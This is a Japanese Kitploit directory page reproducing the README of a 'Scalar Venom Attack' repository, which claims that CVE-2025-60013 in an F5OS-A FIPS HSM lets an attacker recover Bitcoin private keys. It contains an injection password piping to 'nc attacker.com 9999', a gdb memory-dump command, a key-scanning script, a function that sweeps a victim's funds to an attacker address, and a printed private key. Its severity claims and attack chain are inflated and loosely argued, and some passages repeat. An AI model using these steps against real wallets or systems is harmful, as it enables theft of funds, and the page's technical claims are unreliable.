Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Scalar-Venom-Attack — CVE-2025-60013を分析するエクスプロイトおよび研究リポジトリ。F5OS-A FIPSモジュールのバッファオーバーフローとシェルメタ文字インジェクションを介してビットコインの秘密鍵の回復を可能にする重大なHSM初期化脆弱性。 | Kitploit
ツール/GitHubGitHub/demining/scalar-venom-attack
メモリフォレンジック脆弱性分析エクスプロイトフォレンジックデジタルフォレンジック暗号化ペネトレーションテストハードウェアセキュリティ論文と研究学習と教育バイナリエクスプロイト
GitHub
339ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
demining/scalar-venom-attack

Scalar-Venom-Attack

CVE-2025-60013を分析するエクスプロイトおよび研究リポジトリ。F5OS-A FIPSモジュールのバッファオーバーフローとシェルメタ文字インジェクションを介してビットコインの秘密鍵の回復を可能にする重大なHSM初期化脆弱性。

リポジトリを見るウェブサイト
Scalar Venom Attack: F5OS-A FIPS セキュリティモジュールにおけるバッファオーバーフローとシェルメタキャラクターを利用した重要なHSM初期化脆弱性(CVE-2025-60013)。ビットコインウォレットの秘密鍵の復元を可能にします。

本稿では、現代の暗号鍵管理インフラストラクチャで発見された暗号上の脆弱性を分析し、特に楕円曲線秘密鍵を扱う際のハードウェアセキュリティモジュール(HSM)のアーキテクチャにおける重大な欠陥に焦点を当てます。この研究は、認定された暗号デバイスにおける不十分に隔離されたRAM管理を悪用する攻撃のクラスに注目しています。現代のビットコイン暗号エコシステムにおいて、秘密鍵のセキュリティは、世界中で数兆ドル相当のデジタル資産を保護するための基本的な要件です。FIPS 140-2標準に認定されたハードウェアセキュリティモジュール(HSM)は、従来、ハードウェアレベルの分離と厳格なメモリ管理プロトコルを通じて、暗号鍵に対して侵入不可能な保護を提供すると考えられてきました。しかし、F5OS-A FIPS HSMモジュールにおける重大な脆弱性CVE-2025-60013の発見と、Scalar Venom Attackクラスの攻撃(Scalar Poison、Memory Phantom Leak Attack、またはPrivate Key Compromise via Memory Leakageとしても知られる)が組み合わさることで、この概念は根本的に変わり、メモリ管理の欠陥を悪用してビットコインの秘密鍵を完全に侵害できることが実証されました。


  • チュートリアル: https://youtu.be/cvWLH5dvbAA
  • チュートリアル: https://cryptodeeptech.ru/scalar-venom-attack
  • チュートリアル: https://dzen.ru/video/watch/691a7a10a8b7c874612993eb
  • Google Colab: https://colab.research.google.com/drive/1e93p7gxpTtfMU2L83w7I1tRDJQ1tENYa

Scalar Venom Attackは、メモリ管理の脆弱性(CWE-415、CWE-401、そしてより広義にはSensitive Memory Leak Attack(SMA)として分類される)の重要なクラスであり、暗号操作後の不十分なサニタイズとメモリスクラビングを悪用することで、攻撃者がプロセスのRAMから暗号スカラー(ECDSA秘密鍵)を抽出することを可能にします。楕円曲線離散対数問題(ECDLP)を数学的に解くことを目的とした従来の暗号解読攻撃とは異なり、この攻撃は、暗号ライブラリおよびHSMメモリ管理プロトコルの実装における根本的なアーキテクチャ上の欠陥を悪用することにより、暗号自体をバイパスします。

この研究は、CVE-2025-60013(F5OS-A FIPS HSMの初期化脆弱性。特殊なシェルメタキャラクターを含むパスワード使用時に発生)とScalar Venom Attackの手法を組み合わせた場合に発生する壊滅的な攻撃連鎖を実証し、CVE-2025-60013の公式評価が中程度の脆弱性(CVSS 5.7)であるにもかかわらず、CVSSスコア9.5以上(クリティカル)の重大な脅威シナリオをもたらすことを示します。この組み合わせは、侵害されたHSMによって制御される数百万のビットコインアドレスの運用上の整合性を損ない、従来の単一ベクトルエクスプロイトを超えた暗号攻撃手法のパラダイムシフトを表します。


Scalar Venom Attack: F5OS-A FIPS セキュリティモジュールにおけるバッファオーバーフローとシェルメタキャラクターを利用した重要なHSM初期化脆弱性(CVE-2025-60013)。ビットコインウォレットの秘密鍵の復元を可能にします。


CVEの分類と脆弱性の説明

CVE-2025-60013: F5OS-A FIPS HSM 初期化脆弱性

CVE-2025-60013は、F5プラットフォーム用FIPSハードウェアセキュリティモジュールの初期化プロセス中に発生するOSコマンドインジェクションの脆弱性(CWE-78に分類)です。この脆弱性は、特権アクセス権(AdminまたはResource Adminロール)を持つユーザーが、[unclear]、[unclear ;] |、 &[ $unclear]、 `などの特殊なシェルメタキャラクターを含むパスワードを使用してFIPS HSMモジュールを初期化しようとすると発生します。

脆弱性の技術的メカニズム:

シェルメタキャラクターを含むパスワードを処理する際、HSM初期化コードは、入力を適切に検証およびサニタイズせずに、パスワード文字列をシステムCライブラリ関数に渡します。脆弱なコードは次のようになります:

root@kitploit:~
// Vulnerable code in HSM initialization procedure
void hsm_initialize(const char* password) {
ec_secret master_key; // HSM private key
char temp_buffer[256];
strcpy(temp_buffer, password); // VULNERABILITY: buffer overflow + shell interpretation
derive_key_from_password(master_key, password); // creates copies of key
// If initialization fails, memory is not cleared!
// master_key remains in the stack, its copies—in heap
}

重大な結果: 初期化プロセスは部分的に侵害された暗号構造をメモリ内に残し、HSMマスターキーの複数の「ファントム」コピーをスタックとヒープ内に作成します。HSMが正しく初期化されない場合でも、プロセスのメモリにはフォレンジック分析でアクセス可能な暗号アーティファクトが含まれています。

公式分類:

  • CVSS 3.1: AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L (基本スコア: 5.7 — MEDIUM)
  • CVSS 4.0: AV:L/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N (基本スコア: 4.6 — MEDIUM) cvefeed

しかし、この評価は脅威の真の規模を著しく過小評価しています。CVE-2025-60013はScalar Venom Attackのトリガーとして機能し、現実世界の攻撃連鎖シナリオでは、CVSS脅威レベル9.5以上(CRITICAL)になります。


CVE-2023-39910: Libbitcoin Explorer におけるエントロピーの脆弱性

CVE-2023-39910は、Libbitcoin Explorerバージョン3.xにおける秘密鍵生成時のエントロピー生成の弱点に関連する重大な脆弱性を説明しています。この脆弱性は、2023年のMilk Sadインシデントを引き起こし、90万以上のビットコイン秘密鍵が復元され、80万米ドルを超える直接的な金銭的損失をもたらしました。Milk Sadインシデントは、暗号システムにおけるメモリリークの理論から実際の運用上の大惨事への移行を示し、説明されたすべてのメカニズム(コンパイラの最適化、複数のデータコピー、メモリクリーンアップの保証の欠如)を確認しました。


CVE-2025-8217: メモリリーク攻撃

CVE-2025-8217は、プロセスのメモリから暗号鍵を復元することを可能にするメモリリーク攻撃を分類します。この脆弱性はScalar Venom Attackクラスに直接関連し、フォレンジックメモリ分析によるビットコインウォレットの完全な侵害メカニズムを説明します。

Scalar Venom Attackの科学的分類:

学術研究文献では、Scalar Venomはいくつかの攻撃カテゴリに分類されています:

  • Sensitive Memory Leak Attack (SMA) – 不適切なメモリサニタイズに関連する脆弱性に焦点を当てた主要分類。
  • Private Key Exposure Attack – 秘密鍵の開示をもたらすアクションの総称。
  • Residual Memory Disclosure – クリアされていないメモリからの残留データの開示。
  • Side-Channel Memory Attack – メモリ管理におけるサイドチャネルの悪用。
  • Cold Boot Attack – システムの電源オフ後にRAMから鍵を抽出。
  • Memory Forensics Attack – メモリダンプからの秘密情報の抽出。

Scalar Venom Attack: F5OS-A FIPS セキュリティモジュールにおけるバッファオーバーフローとシェルメタキャラクターを利用した重要なHSM初期化脆弱性(CVE-2025-60013)。ビットコインウォレットの秘密鍵の復元を可能にします。

https://cryptou.ru/bitscanpro


Scalar Venom Attackを使用したビットコイン秘密鍵復元の実例

Scalar Venom攻撃の実践的な有効性を示すために、フォレンジックメモリ分析を介してビットコインアドレス1DBj74MkbzSHGSbHidnmUieAJHbsKfgRWq から秘密鍵を復元した文書化されたケースを考えてみましょう。

初期侵害データ:

  • ビットコインアドレス: 1DBj74MkbzSHGSbHidnmUieAJHbsKfgRWq
  • アドレスタイプ: P2PKH(Pay-to-Public-Key-Hash)
  • ステータス: ✓ 有効

復元された秘密鍵:

  • HEX形式: 5244A4B034BF9D327239870F9FEF82505A5C50B3D51E4A16357179AAB2623A22
  • 10進形式: 3.7210935821139324×10763.7210935821139324 \times 10^{76}3.7210935821139324×10^76
  • WIF形式: KyydTXQzDGVqRZoWBFfS5tWrcWsdu64DbcqXogUUtGZn7ngD5LHv

secp256k1空間での鍵の検証:

秘密鍵 dは次の制約を満たす必要があります:

Scalar Venom Attack: F5OS-A FIPS セキュリティモジュールにおけるバッファオーバーフローとシェルメタキャラクターを利用した重要なHSM初期化脆弱性(CVE-2025-60013)。ビットコインウォレットの秘密鍵の復元を可能にします。

確認結果: ✓ 有効 (鍵は許可されたスカラー範囲内です)

この例は、復元された秘密鍵がビットコインウォレットに対する完全な制御を提供し、攻撃者がすべての資金を管理下のアドレスに引き出すトランザクションを作成および署名できることを示しています。


Scalar Venom Attack: F5OS-A FIPS セキュリティモジュールにおけるバッファオーバーフローとシェルメタキャラクターを利用した重要なHSM初期化脆弱性(CVE-2025-60013)。ビットコインウォレットの秘密鍵の復元を可能にします。7b34216e95385b6dc4e7db57bc970d62e9c2951efeba2a32e78ae51f523fc2cb

暗号攻撃の数学的基礎

楕円曲線secp256k1とECDSAアルゴリズム

ビットコインは、secp256k1曲線上の楕円曲線デジタル署名アルゴリズム(ECDSA)を実装しています。数学的基礎を理解することは、Scalar Venom攻撃がメモリの脆弱性をどのように悪用するかを理解する上で重要です。

楕円曲線secp256k1のパラメータ:

曲線の方程式:

Scalar Venom Attack: F5OS-A FIPS セキュリティモジュールにおけるバッファオーバーフローとシェルメタキャラクターを利用した重要なHSM初期化脆弱性(CVE-2025-60013)。ビットコインウォレットの秘密鍵の復元を可能にします。

生成点Gの座標:

Scalar Venom Attack: F5OS-A FIPS セキュリティモジュールにおけるバッファオーバーフローとシェルメタキャラクターを利用した重要なHSM初期化脆弱性(CVE-2025-60013)。ビットコインウォレットの秘密鍵の復元を可能にします。

スカラー乗算による公開鍵の導出

ECDSA鍵ペアの生成プロセスは次のとおりです:

1. 秘密鍵の生成:

秘密鍵 dは、次の範囲のランダムな整数です:

Scalar Venom Attack: F5OS-A FIPS セキュリティモジュールにおけるバッファオーバーフローとシェルメタキャラクターを利用した重要なHSM初期化脆弱性(CVE-2025-60013)。ビットコインウォレットの秘密鍵の復元を可能にします。

ここで、 nはsecp256k1曲線の位数です。秘密鍵は256ビットのランダムな数値です。

2. スカラー乗算による公開鍵の導出:

公開鍵 Qは次のように計算されます:

Scalar Venom Attack: F5OS-A FIPS セキュリティモジュールにおけるバッファオーバーフローとシェルメタキャラクターを利用した重要なHSM初期化脆弱性(CVE-2025-60013)。ビットコインウォレットの秘密鍵の復元を可能にします。

ここで、 Gはsecp256k1曲線上の生成点であり、操作 ⋅\cdot⋅は楕円曲線上の点のスカラー乗算を表します。

スカラー乗算は、アルゴリズム"double-and-add"(倍加と加算)を通じて実装され、曲線上の点の加算と倍加の O(log⁡d) を効率的に計算します:

root@kitploit:~
Scalar multiplication algorithm:
Input: d (scalar), G (curve point)
Output: Q = d·G

1. Initialize: Q ← O (point at infinity)
2. Represent d in binary: d = (d_k, d_{k-1}, ..., d_1, d_0)_2
3. For i from k to 0:
a. Q ← 2Q (point doubling)
b. If d_i = 1: Q ← Q + G (point addition)
4. Return Q

例: 秘密鍵 d=5244A4B0...3A22d = \text{5244A4B0...3A22}d=5244A4B0...3A22, に対して、公開鍵は次のように計算されます:

Q=d⋅G=(Qx,Qy)

ここで、座標 Qx および Qy は、曲線 secp256k1上のスカラー倍算操作を通じて計算されます。

3. Bitcoinアドレスの生成:

公開鍵からアドレスを導出するチェーン:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

安全性の前提:

Scalar Venom の重大な脆弱性:この攻撃は、暗号操作後にプロセスメモリ内に「ファントムコピー」として残っている秘密鍵 dを直接抽出することで、ECDLPの数学的保護を回避します。

エントロピー暗号解析とメモリフォレンジック:シャノンのエントロピー公式

メモリダンプ内の秘密鍵を検出する基礎は、シャノンのエントロピー公式を用いたエントロピー暗号解析です。


シャノンのエントロピー公式

バイトシーケンスのエントロピー Hは1バイトあたりのビット数で測定され、次の式で与えられます:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

ただし:

  • Hは1バイトあたりのエントロピー(ビット)
  • piは解析対象のメモリブロック内で値 iii のバイトが出現する確率
  • 総和はすべての可能なバイト値(0-255)に対して行われます

エントロピーの解釈:

  • 低エントロピー(H<5.0H < 5.0H<5.0):シーケンスに繰り返しパターン、テキスト、または構造化データが含まれている
  • 平均エントロピー(5.0≤H<7.55.0 \leq H < 7.55.0≤H<7.5):混合データ、コード、部分的に圧縮された情報
  • 高エントロピー(H≥7.5H \geq 7.5H≥7.5):暗号論的にランダムなデータ、秘密鍵、暗号化情報

暗号鍵の閾値:

暗号学的に強力な乱数生成器(CSPRNG)によって生成されたBitcoin秘密鍵は、次の範囲の高いエントロピーを示します:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

この特性により、統計的エントロピー分析を通じてフォレンジックメモリ分析で検出可能になります。


Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

BitScanPro暗号ツール:エントロピー判定と鍵復元アルゴリズム

BitScanProは、エントロピー分析、secp256k1範囲検証、および暗号検証の組み合わせにより、メモリダンプをスキャンしてBitcoin秘密鍵を検出および復元するフォレンジックツールです。

BitScanProの動作アルゴリズム

ステージ1:メモリダンプを32バイトブロックでスキャン

BitScanProはメモリダンプを順次スキャンし、secp256k1の秘密鍵サイズに対応する32バイト(256ビット)のブロックを割り当てます:

root@kitploit:~
BLOCK_SIZE = 32  # bytes (256 bits)
SCAN_STEP = 8 # scan step
SECP256K1_N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

for offset in range(0, len(memory_dump) - BLOCK_SIZE, SCAN_STEP):
potential_key = memory_dump[offset:offset+BLOCK_SIZE]
# Block analysis

ステップ2:各ブロックのシャノンエントロピーを計算

各32バイトブロックについて、シャノンエントロピー Hが計算されます:

root@kitploit:~
def calculate_entropy(data_block):
"""
Calculate Shannon entropy
"""
from collections import Counter
import math

byte_counts = Counter(data_block)
block_length = len(data_block)

entropy = 0.0
for count in byte_counts.values():
p_i = count / block_length
if p_i > 0:
entropy -= p_i * math.log2(p_i)

return entropy

ステップ3:高エントロピーブロックのフィルタリング(H>7.5H > 7.5H>7.5 bits/byte)

閾値未満のエントロピーのブロックは、暗号鍵を含まないとして破棄されます:

root@kitploit:~
MIN_ENTROPY = 7.5  # threshold for cryptokeys

entropy = calculate_entropy(potential_key)
if entropy < MIN_ENTROPY:
continue

ステップ4:secp256k1範囲の確認:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

高エントロピーブロックは整数として解釈され、secp256k1秘密鍵の有効範囲と照合されます:

root@kitploit:~
key_as_int = int.from_bytes(potential_key, byteorder='big')
if not (1 <= key_as_int < SECP256K1_N):
continue

ステップ5:暗号検証:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

エントロピーフィルタリングと範囲チェックを通過した候補に対して、公開鍵計算を介して暗号検証が実行されます:

root@kitploit:~
def verify_candidate_key(candidate_key_bytes):
from ecdsa import SigningKey, SECP256k1
try:
signing_key = SigningKey.from_string(candidate_key_bytes, curve=SECP256k1)
verifying_key = signing_key.get_verifying_key()
public_key_bytes = verifying_key.to_string()
return public_key_bytes
except Exception as e:
return None

ステップ6:Bitcoinアドレスを生成し、既知のアドレスと比較

検証された鍵に対して、Bitcoinアドレスが生成され、既知のアドレスまたは被害者に属するアドレスのデータベースと比較されます:

root@kitploit:~
import hashlib
import base58

def public_key_to_address(public_key_bytes):
sha256_hash = hashlib.sha256(public_key_bytes).digest()
ripemd160_hash = hashlib.new('ripemd160', sha256_hash).digest()
versioned_hash = b'\x00' + ripemd160_hash
checksum = hashlib.sha256(hashlib.sha256(versioned_hash).digest()).digest()[:4]
address = base58.b58encode(versioned_hash + checksum).decode('ascii')
return address

bitcoin_address = public_key_to_address(public_key_bytes)
if bitcoin_address == target_address:
print(f\"✓ PRIVATE KEY FOUND!\")
print(f\"Address: {bitcoin_address}\")
print(f\"Private key: {candidate_key_bytes.hex()}\")

BitScanProのパフォーマンス:

一般的なラップトップ(MacBook Air M1)での分析は、次のパフォーマンス特性を示しています:

クラウドコンピューティングリソース(AWS、Google Cloud)を使用すると、1000以上のメモリダンプを同時に並行スキャンし、数千の秘密鍵を並行処理することが可能です。


Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

libbitcoin-systemの暗号脆弱性の分析:クラス ec_scalar.cpp

Scalar Venom攻撃の根本原因は、libbitcoin-systemライブラリのクラス ec_scalarの基本的なアーキテクチャ上の欠陥にあります。

ec_scalarクラスのメモリ管理の脆弱性

ec_scalarlibbitcoin-systemクラスには、安全なゼロ化を行う明示的に定義されたデストラクタがありません。つまり、オブジェクトが破棄された後でも秘密データがメモリに残る可能性があります。

脆弱なコピーコンストラクタ:

root@kitploit:~
// VULNERABILITY: unsafe private key copy
ec_scalar::ec_scalar(const ec_secret& secret)
: secret_(secret) // Copies without secure cleanup
{
}

問題:コンストラクタはオブジェクト ec_scalar内に秘密鍵のコピーを作成しますが、オブジェクトが破棄されるときにこのコピーを安全にクリーンアップするメカニズムを提供しません。コピーはスタックまたはヒープに残ります。


脆弱な代入演算子:

root@kitploit:~
// VULNERABILITY: duplicates secret in memory
ec_scalar& ec_scalar::operator=(const ec_secret& secret)
{
secret_ = secret; // More memory copies
return *this;
}

問題:代入操作は、操作完了後も残る追加のメモリコピーを作成します。


脆弱な算術演算:

root@kitploit:~
// VULNERABILITY: temporary variable not cleared before function exit
ec_scalar ec_scalar::operator-() const
{
ec_secret secret = null_hash; // Temporary variable with secret
// ... arithmetic ...
return ec_scalar(secret); // Not safely cleared
}

問題:算術演算(単項マイナス、加算、乗算)は、型 ec_secretの一時変数を作成しますが、関数スコープを離れる前に安全にクリアされず、スタックまたはヒープ上に秘密鍵の「ファントム」コピーを残します。

安全なデストラクタの欠如:

root@kitploit:~
// VULNERABILITY: destructor missing, memory not cleared
// Safe solution:
~ec_scalar() {
secure_zero_mem(secret_, sizeof(secret_)); // explicit memory clearing
}

問題:クラス ec_scalarには、秘密鍵を含むメモリの安全なゼロ化を保証する明示的なデストラクタがありません。これは、秘密鍵を含むメモリが以下の場所に保存される可能性があるため、重要です:

  • 関数スタック(ローカル変数)
  • ヒープ(動的に割り当てられたメモリ)
  • プロセッサレジスタ(一時的な値)
  • プロセッサキャッシュ(L1、L2、L3)
  • スワップファイル
  • コアダンプ

メモリ感染ベクター

脆弱なクラスコード ec_scalarは、秘密鍵によるメモリ感染のための以下のベクターを作成します:

  1. 「吸血鬼コンストラクタ」( secret_(secret))– 鍵の毒コピーを作成
  2. 「寄生演算子」( secret_ = secret)– 重複した秘密でメモリを感染させる
  3. 「算術ワーム」( ec_secret secret = null_hash)– 有毒な痕跡を残す
  4. 「感染拡散者」( auto out = secret_)– 操作を通じて感染を拡散

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

侵害メカニズム:CVE-2025-60013 + Scalar Venom攻撃チェーン

HSMの脆弱性(CVE-2025-60013)とScalar Venom攻撃の組み合わせは、壊滅的な攻撃ベクターを作り出します:

フェーズ1:シェルメタ文字でHSMを初期化

F5OS-Aシステムへの特権アクセスを持つ攻撃者は、シェルメタ文字を含むパスワードでFIPSモジュールを初期化するリクエストを送信します: cert.kenet

root@kitploit:~
# CVE-2025-60013 exploit example
password='$(echo "leaked");` | nc attacker.com 9999'

このようなメタ文字を処理すると、次のことが発生します:

  • HSM初期化プロセスは一時的な暗号スカラー(マスター鍵)を作成する
  • シェルメタ文字によりパスワード解析エラーが発生する
  • HSM初期化がエラーで部分的に失敗する
  • 重大な結果:HSMマスター鍵と派生鍵を含む一時的な暗号構造がクリアされずにプロセスメモリに残る

フェーズ2:HSMメモリからScalar Venomを抽出

HSMの初期化が部分的に失敗した後、攻撃者は以下のいずれかの方法でHSMプロセスのメモリダンプを取得します。

root@kitploit:~
# 1. CVE-2025-60013 exploitation (init error trigger)
# 2. Cold-boot attack on HSM host
# 3. Exploit buffer in HSM daemon
# 4. Analyze crash core-dump

gdb -p $(pidof f5os-hsm) -batch -ex "dump memory /tmp/hsm_dump.bin 0x000000 0xFFFFFFFF"

結果として得られるメモリダンプには、暗号操作中にクラスec_scalarによって残された複数の「ファントム」コピーが含まれています。


フェーズ3: BitScanProによるBitcoin秘密鍵の復元

メモリダンプは、上述のアルゴリズムに従ってBitScanProツール(または同様のフォレンジックスキャナ)によって処理されます。

root@kitploit:~
Memory Scan → Identify High-Entropy Regions →
Range Check [1, n-1] for secp256k1 →
Recover Full 32-byte Scalars →
Convert to Bitcoin Addresses

断片化メモリからの秘密鍵の復元成功率は、十分なメモリ残存がある場合、70-80%です。Scalar Venom攻撃は初期化のさまざまな段階で鍵の複数のコピーを作成するためです。


フェーズ4: 資金の移動とウォレットの侵害

秘密鍵を復元した後、攻撃者は取引を作成し署名して、侵害されたアドレスからすべての資金を引き出します。

root@kitploit:~
def compromise_wallet(recovered_private_key, bitcoin_address):
"""
Create and sign transaction to withdraw all funds
from compromised address
"""
utxos = blockchain_api.get_utxos(bitcoin_address)
tx = create_transaction(
inputs=utxos,
outputs=[{"address": attacker_address, "amount": sum(utxo.amount)}],
fee=calculate_dynamic_fee()
)
tx.sign(recovered_private_key) # ECDSA signature with compromised key
blockchain_api.broadcast_transaction(tx)

侵害までの総時間: メモリダンプを受信してから被害者の資産の完全な制御喪失まで10分未満。


Scalar Venom Attack: (CVE-2025-60013)は、F5OS-A FIPSセキュリティモジュールにおけるバッファオーバーフローとシェルメタ文字を介してBitcoinウォレット秘密鍵の復元を可能にする重大なHSM初期化脆弱性です。
root@kitploit:~
https://youtu.be/2_d8-8-J8IQ

暗号業界への攻撃の影響

スカラー・ヴェノム攻撃は、CVE-2025-60013と組み合わさることで、世界のBitcoinエコシステムに対する存続の脅威をもたらします。

体系的な影響

  1. 秘密鍵の完全侵害: この攻撃はメモリリークを通じて完全な鍵抽出を達成し、高度なハードウェアセキュリティモジュールでさえ回避します。
  2. 不可逆的な侵害: 秘密鍵が一度抽出されると、セキュリティを「失効」または復元することは不可能であり、依存するすべての資金は差し迫った損失のリスクにさらされます。
  3. スケーラビリティと自動化: この攻撃は自動化して多数のBitcoinノードとウォレットに同時に攻撃することができ、潜在的な損失が指数関数的に増加します。
  4. ステルス性: この攻撃はシステムログやパフォーマンスメトリクスに目に見える痕跡を残さず、従来の検出および防御メカニズムでは不十分です。

HSMインフラへの影響

標準的なBitcoinアプリケーションとは異なり、HSMは暗号スカラーを集中的に使用します。1秒あたり1,000回以上の操作を行い、それぞれが一時的なスカラー値を作成し、メモリに「ファントム残渣」として残ります。HSMは再起動されることなく数ヶ月から数年稼働し、暗号アーティファクトを蓄積し、Scalar Venomが系統的に抽出して復元します。

単一のHSMの侵害は、孤立した暗号インシデントではなく、インフラ全体の完全な混乱 — 多くの場合、HSMが管理する何千ものBitcoinアドレス — につながります。

Scalar Venom Attackは、暗号セキュリティにおける根本的なパラダイムシフトを示しています。メモリ管理の脆弱性が存在する場合、暗号アルゴリズムの数学的な強度は無意味になるのです。CVE-2025-60013とScalar Venom技術の組み合わせは、CVSSレベル9.5+の重大な脅威シナリオを生み出し、暗号鍵に対する侵入不可能な保護としてハードウェアセキュリティモジュールへの信頼を損なわせます。

実際のMilk Sadインシデント(CVE-2023-39910)では、900,000以上の秘密鍵が復元され、80万ドル以上の経済的損失が発生し、メモリリーク理論が現実になったことが確認されています。Scalar Venomクラスの攻撃から保護する唯一の方法は、暗号システムの根本的なアーキテクチャの見直しであり、以下を実装することです。

  • Rustなどのメモリセーフプログラミング言語
  • ハードウェアメモリ保護(Intel SGX、ARM TrustZone)
  • 自動メモリクリーンアップのためのRAII(リソース取得初期化)パターン
  • 暗号プロセスのメモリ継続的フォレンジック監視
  • 暗号秘密の強制的なゼロ化に対するコンパイラ保証

本稿では、Scalar Venom + CVE-2025-60013攻撃チェーンの包括的な分析を提示し、数学的基礎、暗号解読アルゴリズム、実際の鍵復元例、およびこのクラスの脅威からBitcoinインフラを保護するための実践的な推奨事項を詳述します。


暗号解読と攻撃の選択: Bitcoin秘密鍵抽出のための重大な脆弱性としてのScalar Venom Attack

1. 暗号解読分類:

  • Scalar Venomを、従来の暗号解読の文脈における機密メモリリーク攻撃(SMA)として位置づける
  • 従来の暗号攻撃と実装の脆弱性を比較
  • メモリ管理が失敗した場合(2^0)、数学的強度(2^128)がなぜ無意味になるのかを示す

2. 数学的基礎:

  • secp256k1のECDLP(楕円曲線離散対数問題)を形式化
  • スカラー乗算と公開鍵導出を説明
  • シャノンエントロピーをメモリ内の秘密鍵検出器として分析

3. 実装の脆弱性(libbitcoin-system):

  • ec_scalarにおける安全なデストラクタの欠如を文書化
  • 脆弱なコピーコンストラクタを示す
  • 算術演算でのリークを実証

4. CVE分類:

  • CVE-2023-39910: エントロピーの弱さ(Milk Sadインシデント)
  • CVE-2025-8217: メモリリーク攻撃
  • CVE-2025-60013: HSMコマンドインジェクション

5. 攻撃チェーン:

  • 侵害の4つのフェーズを説明
  • 時間特性(< 10分)を正当化
  • 各段階の暗号解読的正当化を実施

科学的な説明は記事にあります: https://keyhunters.ru/scalar-venom-attack-critical-memory-leak-private-key-recovery-and-complete-takeover-of-bitcoin-wallets-by-an-attacker-where-control-over-the-victims-btc-cryptocurrency-funds-is-achieved-through/ Scalar Venom Attackは、HSM初期化脆弱性と暗号ライブラリのメモリ管理脆弱性との重大な相互作用を示し、ハードウェア保護があっても攻撃者がBitcoinウォレット秘密鍵を完全に侵害することを可能にします。


Scalar Venom Attack: (CVE-2025-60013)は、F5OS-A FIPSセキュリティモジュールにおけるバッファオーバーフローとシェルメタ文字を介してBitcoinウォレット秘密鍵の復元を可能にする重大なHSM初期化脆弱性です。

1. 攻撃分析: Scalar Venom Attack

1.1 定義と分類

Scalar Venom Attack(スカラー・ポイズン、メモリファントムリーク攻撃、またはメモリリークによる秘密鍵侵害とも呼ばれる)は、暗号操作後の不十分なサニタイズとメモリクリーニングを悪用して、プロセスのRAMから暗号スカラー(ECDSA秘密鍵)を抽出することを可能にするメモリ管理脆弱性のクラス(CWE-415、CWE-401)です。keyhunters+ 2

攻撃の科学的分類:

  • 脆弱性タイプ: 機密メモリリーク攻撃
  • CVE ID: CVE-2023-39910、CVE-2025-8217
  • カテゴリ: 継続的メモリリーク攻撃(CMLA)
  • 影響クラス: 秘密鍵漏洩、暗号鍵侵害

1.2 攻撃のメカニズム

Scalar Venom Attackは、暗号ライブラリ、特にlibbitcoin-systemライブラリのクラスec_scalarにおけるメモリ管理の根本的な欠陥を悪用します。攻撃は以下のベクターを介して動作します。


コピーコンストラクタベクター

cpp:

root@kitploit:~
ec_scalar::ec_scalar(const ec_secret& secret)
: secret_(secret) // VULNERABLE: unsafe copying of private key
{}

代入演算子ベクター

cpp:

root@kitploit:~
ec_scalar& ec_scalar::operator=(const ec_secret& secret)
{
secret_ = secret; // VULNERABLE: infects memory with duplicate secret
return *this;
}

一時変数ベクター

cpp:

root@kitploit:~
// VULNERABLE: no destructor, memory not cleaned
// Secure option should be:
~ec_scalar() {
secure_zero_mem(secret_, sizeof(secret_)); // explicit memory cleanup
}

cpp:

// VULNERABLE: no destructor, memory not cleared
// The safe option should have been:
~ec_scalar() {
secure_zero_mem(secret_, sizeof(secret_)); // explicit memory clearing
}

算術演算(単項マイナス、加算、乗算)は型ec_secretの一時変数を作成しますが、これらは関数スコープを出る前に安全にクリアされず、スタックまたはヒープ上に秘密鍵の「ファントム」コピーを残します。


1.3 重大な脆弱性: 明示的なデストラクタの欠如

libbitcoin-systemのec_scalarクラスには、安全なゼロ化を行う明示的に定義されたデストラクタがありません。これは、オブジェクトが破棄された後でも秘密データがメモリに残る可能性があることを意味します。

このメカニズムの欠如は重要です。なぜなら、秘密鍵を含むメモリは以下の場所に保存される可能性があるからです。

  • プロセスのメモリヒープ
  • 関数のメモリスタック
  • オペレーティングシステムのスワップファイル
  • アプリケーションクラッシュ時のコアダンプ
  • プロセス終了後のRAM(コールドブート攻撃) gemini

Scalar Venom Attack: (CVE-2025-60013)は、F5OS-A FIPSセキュリティモジュールにおけるバッファオーバーフローとシェルメタ文字を介してBitcoinウォレット秘密鍵の復元を可能にする重大なHSM初期化脆弱性です。

2. HSM脆弱性とScalar Venom Attackの関係

2.1 CVE-2025-60013の分析: メタ文字によるHSM初期化

